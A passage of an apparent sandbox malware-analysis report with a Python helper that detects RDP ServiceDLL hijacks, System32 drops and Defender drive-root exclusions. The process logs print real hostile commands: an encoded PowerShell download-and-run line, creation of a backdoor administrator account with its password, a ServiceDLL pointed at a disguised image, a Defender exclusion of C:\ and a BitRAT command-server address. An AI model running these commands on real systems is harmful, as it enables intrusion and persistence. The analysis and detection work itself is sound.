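    """Flag a TermService ServiceDLL value that is not the stock termsrv.dll in System32."""
    flags: List[str] = []
    for ev in events:
        if not ev["description"].startswith("Set value"):
            continue
        key, sep, value = ev["indicator"].partition(" = ")
        if not sep or not key.lower().endswith(SERVICEDLL_SUFFIX):
            continue
        # The report prints string values quoted, with backslashes doubled.
        value = value.strip('"').replace("\\\\", "\\")
        directory, name = ntpath.split(value)
        if name.lower() != "termsrv.dll" or not directory.lower().endswith(r"\system32"):
            flags.append(f"TermService ServiceDLL -> {value} (set by {ntpath.basename(ev['process'])}, "
                         f"expected {EXPECTED_TERMSRV})")
    return flags


def check_system32_drops(events: List[Dict[str, str]]) -> List[str]:
    """Files created directly under System32 by anything but the servicing stack."""
    drops: List[str] = []
    for ev in events:
        if ev["description"] != "File created":
            continue
        directory, name = ntpath.split(ev["indicator"])
        writer = ntpath.basename(ev["process"]).lower()
        if directory.lower().endswith(r"\windows\system32") and writer not in TRUSTED_SYSTEM32_WRITERS:
            drops.append(f"{name} written by {writer}")
    return drops


def defender_exclusions(cmdline: str) -> List[str]:
    """Items passed to Set-MpPreference -Exclusion*, honouring PowerShell's
    comma-separated list with optional single quotes around each item."""
    m = EXCLUSION_RE.search(cmdline)
    if not m:
        return []
    items = re.findall(r"'([^']*)'|([^,'\s]+)", m.group(1))
    return [quoted or bare for quoted, bare in items]


def excludes_drive_root(exclusions: List[str]) -> bool:
    r"""True when an item is a bare drive root such as C:\ (whole volume exempt)."""
    return any(re.fullmatch(r"[a-z]:\\?", e, re.I) for e in exclusions)


if __name__ == "__main__":
    events = [parse_event(r) for r in SAMPLE_EVENTS]
    for line in check_termservice_dll(events) + check_system32_drops(events):
        print(line)
    ex = defender_exclusions(SAMPLE_CMDLINE)
    print("Defender exclusions:", ex, "| drive root excluded:", excludes_drive_root(ex))
```

On a live host the same three questions are answered by reading HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDLL, listing recent files in System32 by owner and creation time, and running Get-MpPreference to read ExclusionPath; the report-format parsing above is only there so the checks run against this page's own rows.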
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMK2PH5L0YWHSRRA7LAO.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Permission Groups Discovery: Local Groups
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60ab5e21563cdb01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E40.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4E30.tmp"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0V2Nxzqz /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 0V2Nxzqz /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 0V2Nxzqz /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" BCXRJFKE$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 0V2Nxzqz
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 0V2Nxzqz
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 0V2Nxzqz
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
Files
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
\??\c:\Users\Admin\AppData\Local\Temp\c7ssiv2k.cmdline
| MD5 | 475da53b18f6749ff83660c6049a136a |
| SHA1 | 944b6d8a68ae8bf1981b4388cbf8f510ed0359ef |
| SHA256 | 12a64c5a43332827581d129233165f5c77ccdeb21e8ef50edc0b2720ac7a778c |
| SHA512 | 1bd5dbfda5eee0e9998b1be2d1f87aa22ddbbf7366cf0e3e4d1d48a8278d7ad872fc006e5cbc3ed113f3a774c5b18db9cb189a6200f28aa6425f3a27a1ad1840 |
\??\c:\Users\Admin\AppData\Local\Temp\c7ssiv2k.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC4E30.tmp
| MD5 | cace4db006569045bc845c0e9a33b2d1 |
| SHA1 | 788c725fbc5f4d6bdc526baee58da3a5e578195f |
| SHA256 | b735247538d7bd8b9c4fe2fedb0cacf92da9377463ddd0fca334d2c16201dde0 |
| SHA512 | 41125a539232988ad9556066cb47732ca7a3d98382ac68d2502530ff7e6bc8c09bb45013da9f3e2998c500602e02e7da26cb7ec957931ff2cf7f5a41317943de |
C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.dll
| MD5 | 12551435e75d5c1fd4d052cc6c8e54e0 |
| SHA1 | f468601390a262023c7cac49cddb56f6a326a323 |
| SHA256 | 17db10f1effe51c5b60480a8807b3c1c34fb7109d3eeafdf1e98fc4e965fecaa |
| SHA512 | af976ec92276c4ba87b7c447c10910ecb9c97caf6ad3263c32f126e7b30e981b52df1ad3e59ed8f52acdb1404e89589e72bfe0c3230f4461b5fa0e611f419878 |
C:\Users\Admin\AppData\Local\Temp\RES4E40.tmp
| MD5 | 3844f38478c1fd655116149e52e0dc3d |
| SHA1 | 12f7a15c4c7e03bd91aa36e25fec7f2d7c2d9f30 |
| SHA256 | 10d0a5dd9d07ff4c49d69348cc66d5a85e30551dc9a144ad7676e43cdee6c70f |
| SHA512 | 6b97710887187a07a195ce813f2fba1c506dc2664e09a75e4e0c5d56a21555fa6a7362971db3ea7b70685ffca87677b1ddfbfd8cf5c2e64b7357beeee8c774c9 |
C:\Users\Admin\AppData\Local\Temp\c7ssiv2k.pdb
| MD5 | 33b826dac54184faa01b7091afe7ab5b |
| SHA1 | e635fc1ad68fb5cd4e3ff07c429fb2fda9407c59 |
| SHA256 | 64747faa11242331fab709cfd3acd53124b1c6e8d3eb9f87e229e051dc8eb8b5 |
| SHA512 | e384ab4b7d1a2e51f7c2a83e6d3a881b80bb345e5241e865a3b4bb99e0c91cc1a5bc913e15f950d6229cdc662c3b1dbf01db780eeca50f1843b21efbb95ce587 |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 6e1f2b12419b44248556784b9d802c83 |
| SHA1 | bff3ca651dc3e197186319a0c125c01fb2a739df |
| SHA256 | 4dfed275a536cdb54a9f1790ec0357adcb8874cbbbf6a3bddf7514e88fb3cd6f |
| SHA512 | 27348063465ed084bd237ff7640692411c10c4d4d936b055e6db3d5119413fd0aa63a3aa55892d880125d3c2523f51e9b45ab4932c55cec723b8b168a4c4c36a |
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
144s
Command Line
Signatures
BitRAT
Bitrat family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4568 set thread context of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| PL | 185.244.30.28:4898 | N/A | tcp |
| PL | 185.244.30.28:4898 | N/A | tcp |
